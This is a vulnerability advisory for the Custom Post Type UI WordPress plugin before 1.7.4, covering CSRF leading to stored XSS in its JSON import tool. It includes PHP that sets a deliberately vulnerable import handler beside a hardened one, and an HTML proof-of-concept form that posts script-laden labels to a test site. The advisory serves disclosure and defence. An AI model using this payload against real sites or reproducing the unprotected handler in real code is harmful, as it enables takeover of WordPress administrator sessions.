Custom Post Type UI < 1.7.4 - CSRF to Stored XSS



Description
The Custom Post Type UI WordPress plugin, in versions before 1.7.4, was vulnerable to Cross-Site Request Forgery (CSRF) and Stored Cross-Site Scripting (XSS) in the "Import Post Types" functionality of its "Tools" tab. This functionality lets an administrator import "Post Types" from another site, or from a backup, as JSON. The import request was not protected against CSRF, and values taken from the JSON (the post type's name, label, singular label and description in the proof of concept below) were stored and later rendered without adequate escaping. An attacker who could entice a logged-in, suitably privileged victim to visit a page they controlled could therefore have a post type with attacker-chosen labels imported on the victim's behalf, and the JavaScript embedded in those labels would then execute in the browser of users who later view the stored post type settings. If successfully exploited, this could lead to full site compromise.
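The chain described above relies on two missing controls: nothing ties the import POST to the plugin's own admin page, and label strings from the JSON reach the page unescaped. The PHP below is an added illustration written for this entry; it is not the plugin's code or its 1.7.4 fix. The function names, the `demo_post_types` option and the nonce action/field names are assumptions. It places a minimal import handler in the vulnerable shape next to a hardened one that adds a capability check, nonce validation with `check_admin_referer`, input sanitisation and `esc_html` on output.

```php
<?php
// Hypothetical "Tools > Import" handler written to illustrate this advisory.
// Not the plugin's own code. Option name, form field and nonce names are assumptions.

// --- Vulnerable shape: no nonce, no sanitisation, no escaping on output ---
function demo_import_vulnerable() {
    if ( empty( $_POST['cptui_post_import'] ) ) {
        return;
    }
    // A cross-site form POST lands here carrying the victim's cookies; nothing
    // proves the request was initiated from the plugin's own admin page.
    $types = json_decode( wp_unslash( $_POST['cptui_post_import'] ), true );
    update_option( 'demo_post_types', $types ); // attacker-controlled labels stored verbatim
}

function demo_render_vulnerable() {
    foreach ( (array) get_option( 'demo_post_types', array() ) as $slug => $type ) {
        // A label of "<script>alert(1)</script>" is emitted as live markup.
        echo '<li>' . $type['label'] . '</li>';
    }
}

// --- Hardened shape ---
function demo_import_hardened() {
    if ( empty( $_POST['cptui_post_import'] ) ) {
        return;
    }
    // 1. Only users allowed to manage the site may import definitions.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.' );
    }
    // 2. Anti-CSRF: the nonce is bound to the logged-in user and the action name,
    //    so a page on another origin cannot read or forge it. Dies on mismatch.
    check_admin_referer( 'demo_import_post_types', 'demo_import_nonce' );

    $types = json_decode( wp_unslash( $_POST['cptui_post_import'] ), true );
    if ( ! is_array( $types ) ) {
        wp_die( 'Invalid import data.' );
    }

    $clean = array();
    foreach ( $types as $slug => $type ) {
        $slug = sanitize_key( $slug );
        if ( '' === $slug || ! is_array( $type ) ) {
            continue;
        }
        // 3. Strip tags from every human-readable field before it is stored,
        //    so older rendering paths that forget to escape get plain text.
        $clean[ $slug ] = array(
            'name'           => sanitize_text_field( $type['name'] ?? '' ),
            'label'          => sanitize_text_field( $type['label'] ?? '' ),
            'singular_label' => sanitize_text_field( $type['singular_label'] ?? '' ),
            'description'    => sanitize_textarea_field( $type['description'] ?? '' ),
        );
    }
    update_option( 'demo_post_types', $clean );
}

function demo_render_hardened() {
    foreach ( (array) get_option( 'demo_post_types', array() ) as $slug => $type ) {
        // 4. Escape on output regardless of what was stored.
        echo '<li>' . esc_html( $type['label'] ) . '</li>';
    }
}

// The legitimate form must emit the nonce the handler checks; the CSRF page
// in the proof of concept cannot, because it never sees the victim's nonce.
function demo_render_form() {
    echo '<form method="post">';
    wp_nonce_field( 'demo_import_post_types', 'demo_import_nonce' );
    echo '<textarea name="cptui_post_import"></textarea>';
    submit_button( 'Import' );
    echo '</form>';
}
```

Sanitising on input and escaping on output are both kept on purpose: the nonce alone stops the cross-site trigger but leaves an administrator's own import as a stored XSS vector against other admins, and escaping alone leaves raw markup in the database for any other consumer of the option.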
Proof of Concept
<html>
  <body>
  <!-- Hide the attacker's URL from the address bar while the form submits. -->
  <script>history.pushState('', '', '/')</script>
    <!-- Cross-site POST to the plugin's Tools page on the test site (jetpack.local).
         The value is HTML-entity-encoded because the JSON contains double quotes
         and script tags; the browser decodes it before submitting. -->
    <form action="http://jetpack.local/wp-admin/admin.php?page=cptui_tools" method="POST">
      <input type="hidden" name="cptui&#95;post&#95;import" value="&#123;&quot;slug&quot;&#58;&#123;&quot;name&quot;&#58;&quot;&lt;script&gt;alert&#40;1&#41;&lt;&#92;&#47;script&gt;&quot;&#44;&quot;label&quot;&#58;&quot;&lt;script&gt;alert&#40;1&#41;&lt;&#92;&#47;script&gt;&quot;&#44;&quot;singular&#95;label&quot;&#58;&quot;&lt;script&gt;alert&#40;1&#41;&lt;&#92;&#47;script&gt;&quot;&#44;&quot;description&quot;&#58;&quot;&lt;script&gt;alert&#40;1&#41;&lt;&#92;&#47;script&gt;&quot;&#44;&quot;public&quot;&#58;&quot;true&quot;&#44;&quot;publicly&#95;queryable&quot;&#58;&quot;true&quot;&#44;&quot;show&#95;ui&quot;&#58;&quot;true&quot;&#44;&quot;show&#95;in&#95;nav&#95;menus&quot;&#58;&quot;true&quot;&#44;&quot;delete&#95;with&#95;user&quot;&#58;&quot;false&quot;&#44;&quot;show&#95;in&#95;rest&quot;&#58;&quot;true&quot;&#44;&quot;rest&#95;base&quot;&#58;&quot;&quot;&#44;&quot;rest&#95;controller&#95;class&quot;&#58;&quot;&quot;&#44;&quot;has&#95;archive&quot;&#58;&quot;false&quot;&#44;&quot;has&#95;archive&#95;string&quot;&#58;&quot;&quot;&#44;&quot;exclude&#95;from&#95;search&quot;&#58;&quot;false&quot;&#44;&quot;capability&#95;type&quot;&#58;&quot;post&quot;&#44;&quot;hierarchical&quot;&#58;&quot;false&quot;&#44;&quot;rewrite&quot;&#58;&quot;true&quot;&#44;&quot;rewrite&#95;slug&quot;&#58;&quot;&quot;&#44;&quot;rewrite&#95;withfront&quot;&#58;&quot;true&quot;&#44;&quot;query&#95;var&quot;&#58;&quot;true&quot;&#44;&quot;query&#95;var&#95;slug&quot;&#58;&quot;&quot;&#44;&quot;menu&#95;position&quot;&#58;&quot;&quot;&#44;&quot;show&#95;in&#95;menu&quot;&#58;&quot;true&quot;&#44;&quot;show&#95;in&#95;menu&#95;string&quot;&#58;&quot;&quot;&#44;&quot;menu&#95;icon&quot;&#58;&quot;&quot;&#44;&quot;supports&quot;&#58;&#91;&quot;title&quot;&#44;&quot;editor&quot;&#44;&quot;thumbnail&quot;&#93;&#44;&quot;taxonomies&quot;&#58;&#91;&#93;&#44;&quot;labels&quot;&#58;&#123;&quot;menu&#95;name&quot;&#58;&quot;&quot;&#44;&quot;all&#95;items&quot;&#58;&quot;&quot;&#44;&quot;add&#95;new&quot;&#58;&quot;&quot;&#44;&quot;add&#95;new&#95;item&quot;&#58;&quot;&quot;&#44;&quot;edit&#95;item&quot;&#58;&quot;&quot;&#44;&quot;new&#95;item&quot;&#58;&quot;&quot;&#44;&quot;view&#95;item&quot;&#58;&quot;&quot;&#44;&quot;view&#95;items&quot;&#58;&quot;&quot;&#44;&quot;search&#95;items&quot;&#58;&quot;&quot;&#44;&quot;not&#95;found&quot;&#58;&quot;&quot;&#44;&quot;not&#95;found&#95;in&#95;trash&quot;&#58;&quot;&quot;&#44;&quot;parent&#95;item&#95;colon&quot;&#58;&quot;&quot;&#44;&quot;featured&#95;image&quot;&#58;&quot;&quot;&#44;&quot;set&#95;featured&#95;image&quot;&#58;&quot;&quot;&#44;&quot;remove&#95;featured&#95;image&quot;&#58;&quot;&quot;&#44;&quot;use&#95;featured&#95;image&quot;&#58;&quot;&quot;&#44;&quot;archives&quot;&#58;&quot;&quot;&#44;&quot;insert&#95;into&#95;item&quot;&#58;&quot;&quot;&#44;&quot;uploaded&#95;to&#95;this&#95;item&quot;&#58;&quot;&quot;&#44;&quot;filter&#95;items&#95;list&quot;&#58;&quot;&quot;&#44;&quot;items&#95;list&#95;navigation&quot;&#58;&quot;&quot;&#44;&quot;items&#95;list&quot;&#58;&quot;&quot;&#44;&quot;attributes&quot;&#58;&quot;&quot;&#44;&quot;name&#95;admin&#95;bar&quot;&#58;&quot;&quot;&#44;&quot;item&#95;published&quot;&#58;&quot;&quot;&#44;&quot;item&#95;published&#95;privately&quot;&#58;&quot;&quot;&#44;&quot;item&#95;reverted&#95;to&#95;draft&quot;&#58;&quot;&quot;&#44;&quot;item&#95;scheduled&quot;&#58;&quot;&quot;&#44;&quot;item&#95;updated&quot;&#58;&quot;&quot;&#125;&#44;&quot;custom&#95;supports&quot;&#58;&quot;&quot;&#125;&#125;" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Affects Plugin

Custom Post Type UI, fixed in version 1.7.4

References

URL https://plugins.trac.wordpress.org/changeset/2263231/custom-post-type-ui

Classification

Type MULTI

Miscellaneous

Verified No
WPVDB ID 10138

Timeline

Publicly Published 2020-03-17
Added 2020-03-20
Last Updated 2020-03-23
